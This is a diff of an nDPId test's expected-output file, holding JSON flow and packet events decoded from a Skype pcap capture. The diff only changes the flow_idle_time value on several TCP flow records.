@@ -365,8 +365,8 @@ 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1431970655837,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970655837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5ayYAAEARfGrAqAEinTg0ITLdnEIAJe9eeyUCb3+11x21V+othQ6FZpV0z1bnAthdPIEc8bI="} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1431970656151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970656151,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIpxUyC6j+8V4XpsVFaASOJDYRQAAAgQFrAQCCApMZ\/6WPjHZGQEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1431970656151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970656151,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0HiFAAEAGiXTAqAEinTg0LMgunFRemxUVo\/vFeYAQECwuNgAAAQEICj4x2lNMZ\/6W"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1431970656151,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970656151,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIpxUyC6j+8V4XpsVFaASOJDYRQAAAgQFrAQCCApMZ\/6WPjHZGQEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1431970656151,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970656151,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0HiFAAEAGiXTAqAEinTg0LMgunFRemxUVo\/vFeYAQECwuNgAAAQEICj4x2lNMZ\/6W"} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1wZMAAEARPVPAqAEib91KKjLdnEYAIaXieycCe1fKnMoPyS7sKN+ClU5dh7E8u7Wn6g=="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -382,12 +382,12 @@ 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAABBaS8AAEARxk7AqAEi1ceznDLdnF8ALXpUey8C35QflkiVLuyYHEgftQvOcxrFG1PZDcVv\/V5f70upN2kVjw=="} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657448,"flow_last_seen":1431970657448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970657448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1431970657448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657448,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHFJAAEAGizfAqAEinTg0LMgvAbu6eq5bAAAAALAC\/\/9TfQAAAgQFtAEDAwUBAQgKPjHfXgAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1431970657789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970657789,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIgG7yC\/usf9LunquXKASOJDxVgAAAgQFrAQCCApMaAAoPjHfXgEDAwk="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":3,"flow_last_seen":1431970657789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970657789,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0sH5AAEAG9xbAqAEinTg0LMgvAbu6eq5c7rH\/TIAQECxHLAAAAQEICj4x4LNMaAAo"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAABAUUpAAEAGahfAqAEib91Nr8gwnF4IVezmAAAAALAC\/\/8+qQAAAgQFtAEDAwUBAQgKPjHhAAAAAAAEAgAA"} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657448,"flow_last_seen":1431970657448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970657448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1431970657448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657448,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHFJAAEAGizfAqAEinTg0LMgvAbu6eq5bAAAAALAC\/\/9TfQAAAgQFtAEDAwUBAQgKPjHfXgAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1431970657789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970657789,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIgG7yC\/usf9LunquXKASOJDxVgAAAgQFrAQCCApMaAAoPjHfXgEDAwk="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":3,"flow_last_seen":1431970657789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970657789,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0sH5AAEAG9xbAqAEinTg0LMgvAbu6eq5c7rH\/TIAQECxHLAAAAQEICj4x4LNMaAAo"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAABAUUpAAEAGahfAqAEib91Nr8gwnF4IVezmAAAAALAC\/\/8+qQAAAgQFtAEDAwUBAQgKPjHhAAAAAAAEAgAA"} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9oHUAAEARRyvAqAEinTg0DTLdnFUAKQgoezEC\/l8nlzJZpnLIFE7P8fkc8mrPmKIpl9hxLirEQuOc"} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -403,8 +403,8 @@ 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9HFoAAEARyynAqAEinTg0KjLdnEUAKXprezkCzIUWKH677Ew8QeRY2LFi0olqYWN\/wfRNYM+xO4zo"} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1431970658156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970658156,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIpxeyDDQUSwBCFXs56ASOJDrCwAAAgQFrAQCCApNo+IOPjHhAAEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1431970658156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970658156,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0UMZAAEAGaqfAqAEib91Nr8gwnF4IVezn0FEsAoAQECxBFgAAAQEICj4x4iBNo+IO"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1431970658156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970658156,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIpxeyDDQUSwBCFXs56ASOJDrCwAAAgQFrAQCCApNo+IOPjHhAAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1431970658156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970658156,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0UMZAAEAGaqfAqAEib91Nr8gwnF4IVezn0FEsAoAQECxBFgAAAQEICj4x4iBNo+IO"} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MmQAAEARtULAqAEinTg0EDLdnGAAINARezsCntsIeaNpS6NjCmJc+OoOrMkvCcDa"} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -420,10 +420,10 @@ 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/Lr4AAEAR0DTAqAEib91KFDLdnGEAK3JGe0MC70klwlgauZl1jUNJ9T6muSj9wXln3SVqW5QyJa+s4xA="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659480,"flow_last_seen":1431970659480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1431970659480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659480,"pkt":"0NQSxnP1PBXCt3IOCABFAABAaDxAAEAGUyXAqAEib91Nr8gyAbuh2H3fAAAAALAC\/\/+ohwAAAgQFtAEDAwUBAQgKPjHnRwAAAAAEAgAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPbBAAEAG45PAqAEiQAQXpsgznF2bjnkgAAAAALAC\/\/99bQAAAgQFtAEDAwUBAQgKPjHoqQAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659480,"flow_last_seen":1431970659480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 